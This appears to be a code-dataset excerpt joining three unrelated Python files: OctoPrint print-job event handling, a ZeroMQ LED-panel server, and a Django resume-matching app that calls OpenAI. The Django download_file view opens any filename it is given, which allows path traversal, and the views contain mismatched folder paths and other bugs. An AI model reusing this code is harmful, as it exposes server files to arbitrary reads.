Event subscribers should individually take care to filter out "wrong" z-changes\n            eventManager().fire(Events.Z_CHANGE, {"new": newZ, "old": oldZ})\n\n        self._setCurrentZ(newZ)\n\n    def on_comm_sd_state_change(self, sdReady):\n        self._stateMonitor.set_state(\n            self._dict(\n                text=self.get_state_string(),\n                flags=self._getStateFlags(),\n                error=self.get_error(),\n            )\n        )\n\n    def on_comm_sd_files(self, files):\n        eventManager().fire(Events.UPDATED_FILES, {"type": "printables"})\n\n    def on_comm_file_selected(self, full_path, size, sd, user=None, data=None):\n        if full_path is not None:\n            payload = self._payload_for_print_job_event(\n                location=FileDestinations.SDCARD if sd else FileDestinations.LOCAL,\n                print_job_file=full_path,\n                print_job_user=user,\n                action_user=user,\n            )\n            eventManager().fire(Events.FILE_SELECTED, payload)\n            self._logger_job.info(\n                "Print job selected - origin: {}, path: {}, owner: {}, user: {}".format(\n                    payload.get("origin"),\n                    payload.get("path"),\n                    payload.get("owner"),\n                    payload.get("user"),\n                )\n            )\n        else:\n            eventManager().fire(Events.FILE_DESELECTED)\n            self._logger_job.info(\n                "Print job deselected - user: {}".format(user if user else "n/a")\n            )\n\n        self._setJobData(full_path, size, sd, user=user, data=data)\n        self._stateMonitor.set_state(\n            self._dict(\n                text=self.get_state_string(),\n                flags=self._getStateFlags(),\n                error=self.get_error(),\n            )\n        )\n\n        self._create_estimator()\n\n        if self._printAfterSelect:\n            self._printAfterSelect = False\n            self.start_print(pos=self._posAfterSelect, user=user)\n\n    def on_comm_print_job_started(self, suppress_script=False, user=None):\n        self._updateJobUser(\n            user\n        ) # the final job owner should always be whoever _started_ the job\n        self._stateMonitor.trigger_progress_update()\n        payload = self._payload_for_print_job_event(print_job_user=user, action_user=user)\n        if payload:\n            eventManager().fire(Events.PRINT_STARTED, payload)\n            eventManager().fire(\n                Events.CHART_MARKED,\n                {"type": "print", "label": "Start"},\n            )\n            self._logger_job.info(\n                "Print job started - origin: {}, path: {}, owner: {}, user: {}".format(\n                    payload.get("origin"),\n                    payload.get("path"),\n                    payload.get("owner"),\n                    payload.get("user"),\n                )\n            )\n\n            if not suppress_script:\n                self.script(\n                    "beforePrintStarted",\n                    context={"event": payload},\n                    part_of_job=True,\n                    must_be_set=False,\n                )\n\n    def on_comm_print_job_done(self, suppress_script=False):\n        self._fileManager.delete_recovery_data()\n\n        payload = self._payload_for_print_job_event()\n        if payload:\n            payload["time"] = self._comm.getPrintTime()\n            eventManager().fire(\n                Events.CHART_MARKED,\n                {"type": "done", "label": "Done"},\n            )\n            self._updateProgressData(\n                completion=1.0,\n                filepos=payload["size"],\n                printTime=payload["time"],\n                printTimeLeft=0,\n            )\n            self._stateMonitor.set_state(\n                self._dict(\n                    text=self.get_state_string(),\n                    flags=self._getStateFlags(),\n                    error=self.get_error(),\n                )\n            )\n\n            eventManager().fire(Events.PRINT_DONE, payload)\n            self._logger_job.info(\n                "Print job done - origin: {}, path: {}, owner: {}".format(\n                    payload.get("origin"),\n                    payload.get("path"),\n                    payload.get("owner"),\n                )\n            )\n\n            if not suppress_script:\n                self.script(\n                    "afterPrintDone",\n                    context={"event": payload},\n                    part_of_job=True,\n                    must_be_set=False,\n                )\n\n            def log_print():\n                self._fileManager.log_print(\n                    payload["origin"],\n                    payload["path"],\n                    time.time(),\n                    payload["time"],\n                    True,\n                    self._printerProfileManager.get_current_or_default()["id"],\n                )\n\n            
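# the print log entry is written from a short-lived daemon thread, keeping file I/O off the communication callback\n            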
thread = threading.Thread(target=log_print)\n thread.daemon = True\n thread.start()\n\n else:\n self._updateProgressData()\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_print_job_cancelling(self, firmware_error=None, user=None):\n payload = self._payload_for_print_job_event(action_user=user)\n if payload:\n if firmware_error:\n payload[\"firmwareError\"] = firmware_error\n eventManager().fire(Events.PRINT_CANCELLING, payload)\n\n def on_comm_print_job_cancelled(self, suppress_script=False, user=None):\n self._setCurrentZ(None)\n self._updateProgressData()\n\n payload = self._payload_for_print_job_event(\n position=self._comm.cancel_position.as_dict()\n if self._comm and self._comm.cancel_position\n else None,\n action_user=user,\n )\n if payload:\n payload[\"time\"] = self._comm.getPrintTime()\n\n eventManager().fire(Events.PRINT_CANCELLED, payload)\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"cancel\", \"label\": \"Cancel\"},\n )\n self._logger_job.info(\n \"Print job cancelled - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"afterPrintCancelled\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n payload[\"reason\"] = \"cancelled\"\n\n def finalize():\n self._fileManager.log_print(\n payload[\"origin\"],\n payload[\"path\"],\n time.time(),\n payload[\"time\"],\n False,\n self._printerProfileManager.get_current_or_default()[\"id\"],\n )\n eventManager().fire(Events.PRINT_FAILED, payload)\n\n thread = threading.Thread(target=finalize)\n thread.daemon = True\n thread.start()\n\n def on_comm_print_job_paused(self, suppress_script=False, user=None):\n payload = self._payload_for_print_job_event(\n position=self._comm.pause_position.as_dict()\n if self._comm and self._comm.pause_position and not suppress_script\n else None,\n action_user=user,\n )\n if payload:\n eventManager().fire(Events.PRINT_PAUSED, payload)\n self._logger_job.info(\n \"Print job paused - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"pause\", \"label\": \"Pause\"},\n )\n if not suppress_script:\n self.script(\n \"afterPrintPaused\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def on_comm_print_job_resumed(self, suppress_script=False, user=None):\n payload = self._payload_for_print_job_event(action_user=user)\n if payload:\n eventManager().fire(Events.PRINT_RESUMED, payload)\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"resume\", \"label\": \"Resume\"},\n )\n self._logger_job.info(\n \"Print job resumed - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"beforePrintResumed\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def on_comm_file_transfer_started(\n self, local_filename, remote_filename, filesize, user=None\n ):\n eventManager().fire(\n Events.TRANSFER_STARTED, {\"local\": local_filename, \"remote\": remote_filename}\n )\n\n self._sdStreaming = True\n\n 
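# while streaming to SD, the remote file becomes the active job and progress restarts at zero\n        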
self._setJobData(remote_filename, filesize, True, user=user)\n self._updateProgressData(completion=0.0, filepos=0, printTime=0)\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_file_transfer_done(\n self, local_filename, remote_filename, elapsed, failed=False\n ):\n self._sdStreaming = False\n\n payload = {\"local\": local_filename, \"remote\": remote_filename, \"time\": elapsed}\n\n if failed:\n eventManager().fire(Events.TRANSFER_FAILED, payload)\n if callable(self._streamingFailedCallback):\n self._streamingFailedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n else:\n eventManager().fire(Events.TRANSFER_DONE, payload)\n if callable(self._streamingFinishedCallback):\n self._streamingFinishedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n\n self._setCurrentZ(None)\n self._setJobData(None, None, None)\n self._updateProgressData()\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_file_transfer_failed(self, local_filename, remote_filename, elapsed):\n self.on_comm_file_transfer_done(\n local_filename, remote_filename, elapsed, failed=True\n )\n\n def on_comm_force_disconnect(self):\n self.disconnect()\n\n def on_comm_record_fileposition(self, origin, name, pos):\n try:\n self._fileManager.save_recovery_data(origin, name, pos)\n except NoSuchStorage:\n pass\n except Exception:\n self._logger.exception(\"Error while trying to persist print recovery data\")\n\n def on_comm_firmware_info(self, firmware_name, firmware_data):\n self._firmware_info = {\"name\": firmware_name, \"data\": firmware_data}\n\n def _payload_for_print_job_event(\n self,\n location=None,\n print_job_file=None,\n print_job_size=None,\n print_job_user=None,\n position=None,\n action_user=None,\n ):\n if print_job_file is None:\n with self._selectedFileMutex:\n selected_file = self._selectedFile\n if not selected_file:\n return {}\n\n print_job_file = selected_file.get(\"filename\", None)\n print_job_size = selected_file.get(\"filesize\", None)\n print_job_user = selected_file.get(\"user\", None)\n location = (\n FileDestinations.SDCARD\n if selected_file.get(\"sd\", False)\n else FileDestinations.LOCAL\n )\n\n if not print_job_file or not location:\n return {}\n\n if location == FileDestinations.SDCARD:\n full_path = print_job_file\n if full_path.startswith(\"/\"):\n full_path = full_path[1:]\n name = path = full_path\n origin = FileDestinations.SDCARD\n\n else:\n full_path = self._fileManager.path_on_disk(\n FileDestinations.LOCAL, print_job_file\n )\n path = self._fileManager.path_in_storage(\n FileDestinations.LOCAL, print_job_file\n )\n _, name = self._fileManager.split_path(FileDestinations.LOCAL, path)\n origin = FileDestinations.LOCAL\n\n result = {\"name\": name, \"path\": path, \"origin\": origin, \"size\": print_job_size}\n\n if position is not None:\n result[\"position\"] = position\n\n if print_job_user is not None:\n result[\"owner\"] = print_job_user\n\n if action_user is not None:\n result[\"user\"] = action_user\n\n return result\n\n\nclass StateMonitor:\n def __init__(\n self,\n interval=0.5,\n on_update=None,\n on_add_temperature=None,\n on_add_log=None,\n on_add_message=None,\n on_get_progress=None,\n on_get_resends=None,\n ):\n self._interval = interval\n self._update_callback = on_update\n self._on_add_temperature = 
on_add_temperature\n self._on_add_log = on_add_log\n self._on_add_message = on_add_message\n self._on_get_progress = on_get_progress\n self._on_get_resends = on_get_resends\n\n self._state = None\n self._job_data = None\n self._current_z = None\n self._offsets = {}\n self._progress = None\n self._resends = None\n\n self._progress_dirty = False\n self._resends_dirty = False\n\n self._change_event = threading.Event()\n self._state_lock = threading.Lock()\n self._progress_lock = threading.Lock()\n self._resends_lock = threading.Lock()\n\n self._last_update = time.monotonic()\n self._worker = threading.Thread(target=self._work)\n self._worker.daemon = True\n self._worker.start()\n\n def _get_current_progress(self):\n if callable(self._on_get_progress):\n return self._on_get_progress()\n return self._progress\n\n def _get_current_resends(self):\n if callable(self._on_get_resends):\n return self._on_get_resends()\n return self._resends\n\n def reset(\n self,\n state=None,\n job_data=None,\n progress=None,\n current_z=None,\n offsets=None,\n resends=None,\n ):\n self.set_state(state)\n self.set_job_data(job_data)\n self.set_progress(progress)\n self.set_current_z(current_z)\n self.set_temp_offsets(offsets)\n self.set_resends(resends)\n\n def add_temperature(self, temperature):\n self._on_add_temperature(temperature)\n self._change_event.set()\n\n def add_log(self, log):\n self._on_add_log(log)\n with self._resends_lock:\n self._resends_dirty = True\n self._change_event.set()\n\n def add_message(self, message):\n self._on_add_message(message)\n self._change_event.set()\n\n def set_current_z(self, current_z):\n self._current_z = current_z\n self._change_event.set()\n\n def set_state(self, state):\n with self._state_lock:\n self._state = state\n self._change_event.set()\n\n def set_job_data(self, job_data):\n self._job_data = job_data\n self._change_event.set()\n\n def trigger_progress_update(self):\n with self._progress_lock:\n self._progress_dirty = True\n self._change_event.set()\n\n def set_progress(self, progress):\n with self._progress_lock:\n self._progress_dirty = False\n self._progress = progress\n self._change_event.set()\n\n def set_resends(self, resend_ratio):\n with self._resends_lock:\n self._resends_dirty = False\n self._resends = resend_ratio\n self._change_event.set()\n\n def set_temp_offsets(self, offsets):\n if offsets is None:\n offsets = {}\n self._offsets = offsets\n self._change_event.set()\n\n def _work(self):\n try:\n while True:\n self._change_event.wait()\n\n now = time.monotonic()\n delta = now - self._last_update\n additional_wait_time = self._interval - delta\n if additional_wait_time > 0:\n time.sleep(additional_wait_time)\n\n with self._state_lock:\n data = self.get_current_data()\n self._update_callback(data)\n self._last_update = time.monotonic()\n self._change_event.clear()\n except Exception:\n logging.getLogger(__name__).exception(\n \"Looks like something crashed inside the state update worker. 
\"\n \"Please report this on the OctoPrint issue tracker (make sure \"\n \"to include logs!)\"\n )\n\n def get_current_data(self):\n with self._progress_lock:\n if self._progress_dirty:\n self._progress = self._get_current_progress()\n self._progress_dirty = False\n\n with self._resends_lock:\n if self._resends_dirty:\n self._resends = self._get_current_resends()\n self._resends_dirty = False\n\n return {\n \"state\": self._state,\n \"job\": self._job_data,\n \"currentZ\": self._current_z,\n \"progress\": self._progress,\n \"offsets\": self._offsets,\n \"resends\": self._resends,\n }\n\n\nclass DataHistory(InvariantContainer):\n def __init__(self, cutoff=30 * 60):\n def data_invariant(data):\n data.sort(key=lambda x: x[\"time\"])\n now = int(time.time())\n return [item for item in data if item[\"time\"] >= now - cutoff]\n\n InvariantContainer.__init__(self, guarantee_invariant=data_invariant)\n self._last = None\n\n @property\n def last(self):\n return self._last\n\n def append(self, item):\n try:\n return super().append(item)\n finally:\n self._last = self._data[-1] if len(self._data) else None\n","repo_name":"OctoPrint/OctoPrint","sub_path":"src/octoprint/printer/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":75213,"program_lang":"python","lang":"en","doc_type":"code","stars":7739,"dataset":"github-code","pt":"96"} +{"seq_id":"23182836800","text":"import io\nimport syslog\nimport zmq\n\n\nclass SocketBinding:\n def __init__(self, panel):\n self.panel = panel\n self.bind()\n\n def bind(self):\n self.context = zmq.Context()\n self.socket = self.context.socket(zmq.REP)\n self.socket.bind(\"tcp://*:5555\")\n\n while True:\n try:\n message = self.socket.recv()\n if message == b\"UUDDLRLRBA\":\n self.panel.clear()\n else:\n self.panel.draw(io.BytesIO(message))\n self.socket.send(b\"1\")\n except Exception as e:\n syslog.syslog(syslog.LOG_ERR, str(e))\n print(e)\n try:\n self.socket.send(b\"0\")\n except:\n pass\n","repo_name":"fspoettel/thirtytwopixels","sub_path":"server/socket_binding.py","file_name":"socket_binding.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"96"} +{"seq_id":"10084850203","text":"from django.shortcuts import render\r\nfrom django.template import loader\r\nfrom django.http import HttpResponse\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom django.http import FileResponse\r\nimport openai\r\nimport re\r\nimport requests\r\nimport os\r\nimport docx\r\nfrom bs4 import BeautifulSoup\r\nfrom docx import Document\r\nfrom django.http import Http404\r\n\r\n# Create your views here.\r\ndef main(request):\r\n template = loader.get_template('index.html')\r\n return HttpResponse(template.render())\r\n# def jobseeker(request):\r\n# template = loader.get_template('jobseeker.html')\r\n# return HttpResponse(template.render(request))\r\ndef jobseeker(request):\r\n return render(request,'jobseeker.html')\r\ndef resume(request):\r\n return render(request,'resumefinder.html')\r\n\r\n# def scrape_jobs():\r\n# url = 'https://www.freshersworld.com/jobs/jobsearch/python-jobs-in-hyderabad?experience=12'\r\n# response = requests.get(url)\r\n# soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n# job_listings = []\r\n\r\n# # Find the HTML elements containing job information\r\n# job_elements = soup.find_all('div', class_='job-container')\r\n# print(job_elements)\r\n\r\n# for job_element in 
job_elements:\r\n#         # Extract job details\r\n#         job_title = job_elements.find('span', class_='wrap-title').text\r\n#         company_name = job_elements.find('h3', class_='latest-jobs-title font-16 margin-none inline-block company-name').text\r\n#         job_location = job_elements.find('span', class_='job-location display-block modal-open job-details-span').text\r\n#         qualifications = job_elements.find('span', class_='qualifications display-block modal-open pull-left job-details-span').text\r\n#         \r\n#         apply = job_element.find('a', class_='apply-now').text.strip()\r\n#         link = job_element.find('a', class_='list-job-link')['href']\r\n\r\n#         # Add job details to the list\r\n#         job_listings.append({\r\n#             'title': job_title,\r\n#             'location': job_location,\r\n#             'qualification': qualifications,\r\n#             'apply': apply,\r\n#             'link': link\r\n#         })\r\n#     print(job_listings)\r\n\r\n#     return job_listings\r\n    \r\n# def job_search(request):\r\n#     if request.method == 'POST':\r\n#         description = request.POST.get('description', '')\r\n#         print("Search Description:", description)\r\n#         # Call the scrape_jobs() function to get the job listings\r\n#         job_listings = scrape_jobs()\r\n\r\n#         return render(request, 'jobseeker.html', {'job_listings': job_listings,'description':description})\r\n\r\n#     return render(request, 'jobseeker.html')\r\ndef get_resume_names(folder_path):\r\n    resume_names = [doc for doc in os.listdir(folder_path) if doc.endswith(('.txt', '.pdf', '.docx')) and not doc.startswith('~$')]\r\n    return resume_names\r\n# the OpenAI key is read from the environment; no credential lives in the source\r\nopenai.api_key = os.getenv('OPENAI_API_KEY')\r\n\r\ndef filtered_files(request, technologies, experience):\r\n    \r\n    if request.method == 'POST':\r\n        technologies = request.POST.get('technologies')\r\n        experience = request.POST.get('experience')\r\n    \r\n    \r\n    \r\n    # the text handed to the summarizer is built from the search inputs\r\n    description = f"{technologies} {experience}"\r\n    response = openai.Completion.create(\r\n        engine="text-davinci-003",\r\n        prompt=f"Summarize the entered description in a short form and get the technologies:\\n{description}\\n",\r\n        temperature=0.5,\r\n        max_tokens=100,\r\n        n=1,\r\n        stop=None,\r\n        timeout=10,\r\n    )\r\n\r\n    summary = response.choices[0].text.strip()\r\n    lemmatizer = WordNetLemmatizer()\r\n\r\n    lemmatized_words = [lemmatizer.lemmatize(word) for word in summary]\r\n    # print(lemmatized_words)\r\n    # print(summary)\r\n    stop_words =stopwords.words("english")\r\n    stop_words.extend(['.',",",":",")",",","software","(","want","person","knowledge","skills","percent","years","year","different","some", "experience","expertise","technology","technologies", "get", "must","resume","resumes","developer", "latest","engineer","exp","yrs",";","tech","experience"])\r\n    folder_path = "C:/Users/singl/OneDrive/Desktop/docs"\r\n    \r\n    \r\n    matching_files = []\r\n    matching_files1 = []\r\n    matching_files2 = []\r\n    files = os.listdir(folder_path)\r\n    for file in files:\r\n        if file.endswith('.docx'):\r\n            document = Document(os.path.join(folder_path, file))\r\n\r\n            text = "\\n".join([paragraph.text for paragraph in document.paragraphs])\r\n            text = text.lower()\r\n\r\n            \r\n            pattern = r"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)"\r\n            \r\n            matches = re.findall(pattern, text)\r\n            \r\n            numeric_matches = [match[0] for match in matches if match[0]]\r\n            word_matches = [match[1] for match in matches if match[1]]\r\n            \r\n            totals = numeric_matches + word_matches\r\n\r\n            print(totals)\r\n\r\n\r\n            summary_pattern = 
r\"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)\"\r\n\r\n matches = re.findall(summary_pattern, description)\r\n \r\n \r\n numeric_matches1 = [match[0] for match in matches if match[0]]\r\n word_matches1 = [match[1] for match in matches if match[1]]\r\n \r\n sum_totals = numeric_matches1 + word_matches1\r\n\r\n print(sum_totals)\r\n\r\n\r\n state = \"\"\r\n for sum_total in sum_totals:\r\n for total in totals:\r\n if sum_total in total:\r\n state = str(\"Experience {} years match \" .format(total))\r\n print(state)\r\n \r\n\r\n tokens = word_tokenize(summary.lower())\r\n filtered_words = []\r\n for token in tokens:\r\n if token not in stop_words:\r\n filtered_words.append(token)\r\n print(filtered_words)\r\n num_keywords = len(filtered_words)\r\n matching_keywords = []\r\n for word in filtered_words:\r\n if word in text:\r\n matching_keywords.append(word)\r\n\r\n\r\n\r\n matching_keywords1 = len(matching_keywords)\r\n print(matching_keywords)\r\n matching_percentage = matching_keywords1 / num_keywords * 100\r\n print(matching_percentage)\r\n matching = []\r\n\r\n if matching_percentage>=1:\r\n\r\n if matching_percentage >= 75:\r\n matching_files.append((file, matching_percentage,matching_keywords,state))\r\n elif matching_percentage>=50 and matching_percentage<75:\r\n matching_files1.append((file, matching_percentage,matching_keywords,state))\r\n elif matching_percentage>=1 and matching_percentage<50:\r\n # else:\r\n matching_files2.append((file, matching_percentage,matching_keywords,state)) \r\n else:\r\n print(\"No Files Found\")\r\n\r\n else:\r\n print(\"No Files Found\")\r\n \r\n sorted_files1 = sorted(matching_files, key=lambda x: x[1], reverse=True)\r\n \r\n sorted_files2 = sorted(matching_files1, key=lambda x: x[1], reverse=True)\r\n \r\n sorted_files3 = sorted(matching_files2, key=lambda x: x[1], reverse=True)\r\n \r\n filtered_files=[]\r\n folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs/\"\r\n\r\n for file_info in sorted_files1:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files.append(file_path)\r\n\r\n print(\"filtered_files with sorted_files1 start\")\r\n print(filtered_files)\r\n print(\"filtered_files with sorted_files1 end\")\r\n\r\n\r\n\r\n\r\n filtered_files1=[]\r\n folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs/\"\r\n\r\n for file_info in sorted_files2:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files1.append(file_path)\r\n\r\n print(\"filtered_files1 with sorted_files2 start\")\r\n print(filtered_files1)\r\n print(\"filtered_files1 with sorted_files2 end\")\r\n\r\n filtered_files2=[]\r\n folder_path = \"C:/Users/singl/OneDrive/Desktop/docs\"\r\n\r\n for file_info in sorted_files3:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files2.append(file_path)\r\n filtered_files = [os.path.basename(file) for file in filtered_files]\r\n filtered_files1 = [os.path.basename(file) for file in filtered_files1]\r\n filtered_files2 = [os.path.basename(file) for file in filtered_files2]\r\n # filtered_files = [file for file in filtered_files]\r\n # filtered_files1 = [file for file in filtered_files1]\r\n # filtered_files2 = [file for file in filtered_files2]\r\n # filtered_files = [os.path.relpath(file, settings.MEDIA_ROOT) for file in filtered_files]\r\n\r\n print(\"filtered_files2 with sorted_files3 start\")\r\n print(filtered_files2)\r\n print(\"filtered_files2 with sorted_files3 
end")\r\n    \r\n\r\n    matching_files_str = "\\n".join([f"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state} " for file, percentage,matching_keywords,state in sorted_files1])\r\n    matching_files_str1 = "\\n".join([f"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state}" for file, percentage,matching_keywords,state in sorted_files2])\r\n    matching_files_str2 = "\\n".join([f"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state}" for file, percentage,matching_keywords,state in sorted_files3])\r\n    \r\n\r\n    count = len(matching_files + matching_files1 + matching_files2)\r\n\r\n    print(f" {count} files were filtered ")\r\n    \r\n    context = {\r\n        'count': count,\r\n        'filtered_files': filtered_files,\r\n        'matching_files_str': matching_files_str,\r\n        'filtered_files1': filtered_files1,\r\n        'matching_files_str1': matching_files_str1,\r\n        'filtered_files2': filtered_files2,\r\n        'matching_files_str2': matching_files_str2,\r\n        'technologies': technologies,\r\n        'experience': experience,\r\n    }\r\n    print(f"{count} files were filtered")\r\n    # return count,filtered_files,matching_files_str,filtered_files1,matching_files_str1,filtered_files2,matching_files_str2\r\n\r\n    # render() accepts only the context mapping; the search inputs are passed inside it\r\n    return render(request, 'resumefinder.html', context)\r\n    \r\n    \r\n    \r\n# from django.http import HttpResponse\r\n# import os\r\n# from django.http import HttpResponse, FileResponse\r\n# from django.conf import settings\r\n# def download_file(request, filename):\r\n#     file_path = os.path.join('C:/Users/sp13/OneDrive/Desktop/Resumes/', filename) # Replace 'path_to_folder' with the actual folder path\r\n#     if os.path.exists(file_path):\r\n#         with open(file_path, 'rb') as file:\r\n#             response = HttpResponse(file.read(), content_type='application/docx')\r\n#             response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path)\r\n#         return response\r\n#     else:\r\n#         raise Http404("File does not exist")\r\n\r\n\r\n\r\n\r\n    \r\n    #return count,filtered_files,matching_files_str,filtered_files1,matching_files_str1,filtered_files2,matching_files_str2\r\n# def download_file(request, filename):\r\n#     file_path = f"C:/Users/sp13/OneDrive/Desktop/Resumes/{filename}" # Update the file path based on your actual directory\r\n\r\n#     try:\r\n#         with open(file_path, 'rb') as file:\r\n#             response = FileResponse(file)\r\n#             response['Content-Disposition'] = f'attachment; filename="{filename}"'\r\n#             return response\r\n#     except FileNotFoundError:\r\n#         raise Http404("File does not exist") \r\n\r\n# from django.http import FileResponse, Http404\r\n# import os\r\n\r\n# def download_file(request, filename):\r\n#     file_path = os.path.join('C:/Users/singl/OneDrive/Desktop/Resumes/', filename) # Update with the actual folder path\r\n\r\n#     if os.path.exists(file_path):\r\n#         with open(file_path, 'rb') as file:\r\n#             response = FileResponse(file)\r\n#             response['Content-Disposition'] = f'attachment; filename="{filename}"'\r\n#             return response\r\n\r\n#     return render(request, 'resumefinder.html')\r\nimport mimetypes\r\nimport zipfile\r\ndef download_file(request, filename):\r\n    folder_path = 'C:/Users/singl/OneDrive/Desktop/docs/' # Replace with the actual folder path\r\n    file_path = os.path.join(folder_path, filename)\r\n\r\n    if os.path.isfile(file_path):\r\n        fl = open(file_path, 'rb')\r\n        mime_type, _ = mimetypes.guess_type(file_path)\r\n        response = HttpResponse(fl, content_type=mime_type)\r\n        response['Content-Disposition'] = f"attachment; filename={filename}"\r\n        return response\r\n    else:\r\n        raise 
Http404(\"File does not exist\")\r\n\r\n# def download_files(request):\r\n# folder_path = 'C:/Users/singl/OneDrive/Desktop/Resumes/' # Replace with the actual folder path\r\n# files = request.POST.getlist('files') # Assuming you have a list of selected files from the form\r\n\r\n# zip_path = os.path.join(folder_path, 'download.zip')\r\n# zip_file = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)\r\n\r\n# for filename in files:\r\n# file_path = os.path.join(folder_path, filename)\r\n# if os.path.isfile(file_path):\r\n# zip_file.write(file_path, os.path.basename(file_path))\r\n\r\n# zip_file.close()\r\n\r\n# if os.path.isfile(zip_path):\r\n# fl = open(zip_path, 'rb')\r\n# mime_type, _ = mimetypes.guess_type(zip_path)\r\n# response = HttpResponse(fl, content_type=mime_type)\r\n# response['Content-Disposition'] = 'attachment; filename=\"download.zip\"'\r\n# return response\r\n# else:\r\n# raise Http404(\"No files selected or does not exist\")\r\n\r\n# def search1(request):\r\n# if request.method == 'POST':\r\n# description = request.POST.get('description1')\r\n# def filtered_files(request):\r\n \r\n \r\n# response = openai.Completion.create(\r\n# engine=\"text-davinci-003\",\r\n# prompt=f\"Summarize the enter description in a short form and get the technologies:\\n{description}\\n\",\r\n# temperature=0.5,\r\n# max_tokens=100,\r\n# n=1,\r\n# stop=None,\r\n# timeout=10,\r\n# )\r\n\r\n# summary = response.choices[0].text.strip()\r\n# lemmatizer = WordNetLemmatizer()\r\n\r\n# lemmatized_words = [lemmatizer.lemmatize(word) for word in summary]\r\n# # print(lemmatized_words)\r\n# # print(summary)\r\n# stop_words =stopwords.words(\"english\")\r\n# stop_words.extend(['.',\",\",\":\",\")\",\",\",\"software\",\"(\",\"want\",\"person\",\"knowledge\",\"skills\",\"percent\",\"years\",\"year\",\"different\",\"some\", \"experience\",\"expertise\",\"technology\",\"technologies\", \"get\", \"must\",\"resume\",\"resumes\",\"developer\", \"latest\",\"engineer\",\"exp\",\"yrs\",\";\",\"tech\",\"experience\"])\r\n# folder_path = \"C:/Users/singl/OneDrive/Desktop/docs\"\r\n \r\n \r\n# matching_files = []\r\n# matching_files1 = []\r\n# matching_files2 = []\r\n# files = os.listdir(folder_path)\r\n# for file in files:\r\n# if file.endswith('.docx'):\r\n# document = Document(os.path.join(folder_path, file))\r\n\r\n# text = \"\\n\".join([paragraph.text for paragraph in document.paragraphs])\r\n# text = text.lower()\r\n \r\n# return render(request, 'results.html', {'description': description, })\r\n# return render(request,'resumefinder.html')\r\n# def searches(technologies, experience):\r\n# lemmatizer = WordNetLemmatizer()\r\n# folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs\"\r\n\r\n# matching_files = []\r\n \r\n# files = os.listdir(folder_path)\r\n# for file in files:\r\n# if file.endswith('.docx'):\r\n# document = Document(os.path.join(folder_path, file))\r\n\r\n# text = \"\\n\".join([paragraph.text for paragraph in document.paragraphs])\r\n# text = text.lower()\r\n\r\n# # Perform filtering based on technologies\r\n# technologies_list = technologies.split(',')\r\n# for tech in technologies_list:\r\n# if tech.strip().lower() in text:\r\n# matching_files.append(file)\r\n# break\r\n\r\n# # Perform filtering based on experience\r\n# pattern = r\"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)\"\r\n# matches = re.findall(pattern, text)\r\n# numeric_matches = [match[0] for match in matches if match[0]]\r\n# word_matches = [match[1] for 
match in matches if match[1]]\r\n#             totals = numeric_matches + word_matches\r\n\r\n#             for total in totals:\r\n#                 if experience.strip().lower() in total.lower():\r\n#                     matching_files.append(file)\r\n#                     break\r\n\r\n#     return matching_files\r\n\r\ndef search_resumes(request):\r\n    if request.method == 'GET':\r\n        technologies = request.GET.get('technologies', '')\r\n        experience = request.GET.get('experience', '')\r\n\r\n        # filtered_files() builds the matching-resume context and renders the\r\n        # results page itself, so this view simply delegates to it\r\n        return filtered_files(request, technologies, experience)\r\n    \r\n    \r\n\r\n\r\n\r\n\r\n","repo_name":"saziya19/hiregenai","sub_path":"employees/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
